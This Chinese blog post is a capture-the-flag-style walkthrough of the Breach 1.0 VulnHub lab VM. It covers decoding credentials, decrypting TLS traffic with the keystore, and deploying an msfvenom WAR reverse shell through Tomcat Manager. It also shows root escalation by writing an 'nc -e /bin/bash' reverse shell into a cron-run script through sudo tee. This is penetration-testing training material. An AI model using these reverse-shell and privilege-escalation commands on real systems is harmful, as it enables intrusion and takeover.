Breach 1.0 靶机

最新推荐文章于 2023-11-06 17:27:39 发布
最新推荐文章于 2023-11-06 17:27:39 发布
阅读量201 收藏 1
点赞数
分类专栏: 渗透测试 文章标签: 网络 服务器 运维 网络安全 笔记 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51559599/article/details/133963794
版权

Breach 1.0

环境配置

  • 设置 VMware 上的仅主机模式网卡,勾选 DHCP 自动分配 IP,将子网改为 192.168.110.0/24

    image-20231020153422311

  • 将靶机和 kali 连接到仅主机网卡

信息搜集

存活检测

image-20231020165835393

详细扫描

后台网页扫描

image-20231020170040613

网页信息搜集

image-20231020170058373

image-20231020170128236

Initech被入侵,董事会投票决定引入内部的Initech网络咨询,LLP部门来协助。鉴于此次入侵事件的高知名度和几乎灾难性的损失,随后出现了许多针对该公司的攻击。Initech已委托其顶级顾问,由Bill Lumbergh、CISSP和Peter Gibbons、CjEH、SEC+、NET+、A+领导,对漏洞进行控制和分析。该公司几乎没有意识到,这次入侵并不是熟练的黑客所为,而是一名心怀不满的前雇员离职时留下的临别礼物。TOP咨询公司一直在努力遏制这一漏洞。然而,他们自己的职业道德和留下的烂摊子可能是公司垮台的原因。

  • 查看源码发现疑似密文,并且有一个 herf 链接,点击胖子图片进行跳转

    image-20231020170750540

    Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo

  • md5 解密

    cGdpYmJvbnM6ZGFtbml0ZmVlbCRnb29kdG9iZWFnYW5nJHRh

    image-20231020173011317

    再次解密

    pgibbons:damnitfeel$goodtobeagang$ta

  • 跳转的网页

    image-20231020170843459

  • 点击 employee portal 跳转到

    image-20231020173259352

  • 尝试使用刚刚解密出的值进行登录

    pgibbons
damnitfeel$goodtobeagang$ta

    成功登录

    image-20231020173442067

  • 依次查询过滤有用信息

    最终在邮件中的第三封邮件中发现 “秘密证书” 字样

    并带有文件

    image-20231020174015307

  • 下载证书

    邮件上说把文件保存到这个网址

    尝试访问

    image-20231020174201646

  • 访问网页直接下载了 index.keystore 文件

    image-20231020174359224

  • 在 View Account 页面发现了一个流量包文件,下载

    并发现密码字样,密码为 tomcat

    image-20231020212823568

    image-20231020213435047

流量信息搜集

  • 使用 wireshark 打开文件,发现有许多 TLS 加密的报文

    image-20231020213752184

  • .keystore 密钥/证书

    .keystore文件是一种用于存储密钥和证书的二进制文件格式。

    常见的TLS证书格式包括:

    1. DER格式:以.der或.crt扩展名保存的证书文件,通常包含单个X.509证书。
    2. PEM格式:以.pem或.crt扩展名保存的证书文件,它使用Base64编码,并使用"-----BEGIN CERTIFICATE-----“和”-----END CERTIFICATE-----"标记来界定证书内容。PEM格式可以包含单个或多个X.509证书。

    在Keystore中,使用Java的keytool工具可以将DER或PEM格式的证书导入到JKS或PKCS#12格式的Keystore中。

    解密:

    keytool -importkeystore -srckeystore index.keystore -destkeystore breach.p12 -deststoretype pkcs12 -srcalias tomcat
 
-importkeystore 导出keystore
 
-srckeystore  源keystore文件
 
-destkeystore  导出之后的证书存放路径
 
-deststoretype  导出keystore之后的证书类型
 
-srcalias 源alias

    成功生成证书文件

    image-20231020215004422

  • 将证书文件导入 wireshark

    image-20231020215728070

    image-20231020220256455

  • 查看数据包

    发现加密密文和一个网站,wireshark 已经将其解密了

    image-20231020221105881

  • 访问网站

    被浏览器的安全措施拦截

    image-20231020221439547

  • 使用 bp 代理,拦截,放包

    image-20231021130254880

  • 输入 wireshark 流量包解密的账号密码

    tomcat
Tt\5D8F(#!*u=G)4m7zB

    image-20231021130324438

  • 成功登录进入Tomcat Manager 界面

    image-20231021130459816

webshell

  • 生成 .war 木马文件

    msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.110.128 LPORT=8888 -f war > shell.war

    image-20231021131314929

  • 启动 msfconsole 并设置参数,开启监听

    mscconsole

    use exploit/multi/handler

    set LHOST 192.168.110.140
set LPORT 8888
run

    image-20231021131858531

  • 上传木马文件

    image-20231021132037962

  • 打开上传的文件

    image-20231021132235570

  • 反弹成功

    image-20231021132357541

提权

信息搜集

  • 尝试 sudo -l 失败

    image-20231021132537316

  • 尝试 suid 提权失败

    image-20231021132941361

  • 搜集系统中有用信息

    最终在 /var/www/5446 目录下发现了 php 文件,其中显示了数据库的 user 为 root,并且密码为空

    image-20231021133253227

数据库信息搜集

  • 在 mysql 数据库的 user 表中发现了数据库用户 milton 及加密的密码

    6450d89bd3aff1d893b85d3ad65d2ec2

    image-20231021134539827

  • 解密密码

    thelaststraw

    image-20231021134707886

  • 查看 /etc/passwd 文件也存在该用户

    尝试用其数据库密码进行登录

    image-20231021134847987

  • 成功登录

    image-20231021134939127

  • 尝试切换 blumbergh 用户

    image-20231021135854863

  • 提示需要密码

    image-20231021135953508

  • 查看用户密码文件

    image-20231021140108218

    发现了 Bill 字样

  • 在网页信息搜集时看到过 Bill 的图片

    下载图片,检测是否有隐写信息

    strings bill.png

    image-20231021140809165

  • 测试登录密码

    coffeestains

    image-20231021141030674

  • sudo -l 查看权限

    可以使用 tee 命令修改 tidup.sh

    image-20231021141116787

    tee 命令可将一个文件输出的内容输入到另一个文件

    读取 a.txt 中文本内容写入 file.txt

    cat a.txt | tee file.txt

  • 查看 tidup.sh 权限

    image-20231021151358661

  • 查看文件

    image-20231021164920861

    说这个脚本每三分钟自动运行一次

  • 创建一个文件写入命令 bash

    image-20231021153535615

  • 写入

    cat shell | sudo  tee /usr/share/cleanup/tidyup.sh

    image-20231021154045685

  • 失败,尝试使用 nc 反弹

    nc -e /bin/bash 192.168.110.129 7777

    image-20231021165711137

  • 监听,等待连接

    image-20231021165809751

    成功 root

    image-20231021170223329

总结

  • TLS 加密证书、.keystore 文件

  • 浏览器指明网页 https 证书不可信可使用 bp 拦截代理解决

  • Tomcat Manager 上传 msf 生成的 .war 木马实现 webshell

  • tee

gjl_
关注
专栏目录
(vulnhub靶机通关)Breach系列:breach-1.0
yang1234567898的博客
01-22 4350
靶机下载地址:https://download.vulnhub.com/breach/Breach-1.0.zip 环境配置 根据作者描述,靶机配置了一个静态IP地址(192.168.110.140),需要仅主机适配器配置此子网 配置仅主机网卡为DHCP,子网地址192.168.110.0 注意:类型为仅主机的网卡才可以 VMware适配器改成以下地址 靶机和kali网络选仅主机模式 确实环境是否配置好 环境搞好,直接开干! 信息收集 扫端口 扫描.
【vlunhub靶场打靶记录】breach1打靶
weixin_54603520的博客
05-11 296
breach1打靶记录,难度中上游,主要考验打靶时思维的灵活性以及对渗透过程中不同的方向的广度深度!需要打靶人员能够有较多的渗透经验和较强的变通能力以及比较好的耐心!
Vulnhub靶场Breach1.0详解
m0_65712192的博客
02-14 1452
Vulnhub靶场Breach1.0详解
【vulnhub靶场】Breach1打靶过程记录
didiplus
07-18 1415
Vulnhub是一个提供各种漏洞环境的一个靶场平台,大部分都是虚拟机镜像文件,预先设计各种漏洞需要使用VMware或者VirtualBox运行,每个镜像都有破解的目标,从启动虚拟机到获取系统的root权限和查看flag。.........
breach1靶机攻略
最新发布
qq_58683895的博客
11-06 154
这个靶机ip固定为 192.168.110.140使用vmware的话,将它加入一张仅主机的网卡就行,比如vmnet7,然后vmnet设置成192.168.110.0网段,kali也新建一张网卡加入该网卡。
靶机实战-Breach-1.0
滕财然的博客
03-25 2545
Breach-1.0靶机实战 文章目录Breach-1.0靶机实战1、主机发现2、端口扫描3、web服务(80端口)4、提权5、总结 1、主机发现 没有IP的话自行配置IP 2、端口扫描 发现开放了N多端口,可能做了端口防护,那直接尝试访问80端口 3、web服务(80端口) 查看页面源码: 发现疑似base64加密的字符串 尝试解密: 发现解出来又是个base64,继续解密,最后解密出...
breach靶机
Encild的博客
11-09 420
[2021 11 7] breach靶机端口扫描GetShell 目录 breach靶机 端口扫描 GetShell breach靶机 端口扫描 已知IP为192.168.110.140 直接扫描端口: sudo nmap -sF -p1-65535 192.168.110.140 访问80端口: 翻译: Initech 遭到破坏,董事会投票决定引入其内部的 Initech Cyber•• Consulting LLP 部门...
【vulnhub】---Breach-1.0靶机
qq_43168364的博客
08-22 1171
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:Breach-1.0靶机(192.168.110.140) 攻击机:kali Linux(192.168.15.129) 物理机IP:192.168.110.220 相关配置 由于该靶机用的是静态的ip,我们要访问的话需要改变主机的IP和他处于同一个网端,为了让物理机还可以访问互联网,我们给物理机添加上两个网卡 这样就OK了 二、信息收集 主机发现 该靶机已知IP地址无需主机发现 端
VulnHub breach1.0
jelly
07-12 971
配置靶机网络 作者提示:The VM is configured with a static IP address (192.168.110.140) so you will need to configure your host-only adaptor to this subnet. 意思是靶机已经配置了静态IP地址为192.168.110.140,所以为了和靶机通行需要把kali主机的网卡设置一下。 这里在virtualbox中可以配置一块新的网卡,为了在同一地址段,设置如下。 ...
一次失败的vulnhub靶机渗透之breach1.0
weixin_44255856的博客
08-06 1452
靶机地址下载https://pan.baidu.com/s/1KuwK_8MqCWhcIcNpTJ-OLQ 这是靶机的介绍 在一个由多个部分组成的系列文章中,Breach 1.0是一个初学者到中级boot2root/CTF挑战。解决问题需要扎实的信息收集和坚持不懈的努力。千方百计。 VM配置了一个静态IP地址(192.168.110.140),因此您需要将您的主机专用适配器配置到这个子网。 非常...
VulnHub渗透测试实战靶场笔记(持续更新)
晚风不及你
03-05 7815
Breach1.0 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。 VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网。非常感谢Knightmare和rastamouse进行测试和提供反馈。...
vulnhub breach1渗透
qq_45455136的博客
03-10 476
breach1靶场渗透准备环境 准备环境
Vulnhub之Breach1.0靶场练习
m0_46371267的博客
02-22 3880
靶机信息 下载链接: https://download.vulnhub.com/breach/Breach-1.0.zip 环境配置 1.解压后用vmware打开,这里是我已经安装好的,未安装的只有ova和readme.txt两个文件 Pasted image 20220221090234.png 2.靶机默认使用仅主机模式,ip为192.168.110.140,所以需要将vmnet1的ip设置在192.168.110.0此网段。 Pasted image 20220221090526.png Pasted
Vulnhub靶场之Breach1.0
shy的博客
05-19 968
靶机IP地址发现: 1、arp-scan --interface eth1 192.168.110.1/24 2、 nmap -sP 192.168.110.1/24 3、 fping -a -g 192.168.110.1/24 4、linux:for k in $( seq 1 255);do ping -c 1 192.168.99.$k|grep "ttl"|awk -F "[ :]+" '{print $4}'; done windows:for /l %i in (1,1,
靶场-breach1
qq_45751902的博客
10-18 1402
在下载了keystore文件的目录中打开终端,输入命令:keytool -list -keystore keystore,输入口令tomcat,查看keystore密钥库中的证书。将图片下载后利用图片隐写术, strings分析图片,或者exiftool查看(突然发现,那张bill.png(上面有字的)说的话,我理解错了,需要用隐写术)打开bill.png,上面的字让我们看源码(在后面才知道这句话的真正意思),但是这个上面图片的源码都没有内容,想到刚才80端口还有一个图片,这个源码有内容。
vulnhub-Breach_1.0
HEAVEN569的博客
06-28 1227
vulnhub-Breach_1.0内网主机渗透测试
kali渗透综合靶机(十五)--Breach-1.0靶机
WY92139010的博客
06-09 1464
kali渗透综合靶机(十五)--Breach-1.0靶机 靶机下载地址:https://download.vulnhub.com/breach/Breach-1.0.zip 一、主机发现 1.netdiscover -i eth0 -r 192.168.110.0/24    二、端口扫描 1. masscan --rate=10000 -p0-65535 192.168....
Vulnhub靶场渗透练习(一) Breach1.0
深蓝旭的博客
08-24 440
打开靶场 固定ip需要更改虚拟机为仅主机模式192.168.110.140 打开网页http://192.168.110.140/index.html 查看源代码发现可以加密字符串 猜测base64 解密cGdpYmJvbnM6ZGFtbml0ZmVlbCRnb29kdG9iZWFnYW5nJHRh 得到这个结果可能是二次加密在base64解密 得到pgibbons:damnitfeel$goodtobeagang$ta 去除: 得到两个字符串pgibbons,dam...
vuluhub靶场实战之breach1.0
wangyanjienice的博客
12-12 1222
环境 kali(攻击):192.168.110.128 breach(靶机):192.168.110.140 0x01 主机发现 netdiscover -i eth0 -r 192.168.110.0/24 Currently scanning: Finished! | Screen View: Unique Hosts
identity breach什么意思
03-28
identity breach指的是指个人身份信息被未经授权的第三方获取或使用的情况。这可能涉及到诸如姓名、地址、电话号码、电子邮件地址、社会保险号码、银行账户信息和其他个人信息的泄露。这种情况通常会对个人造成严重...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值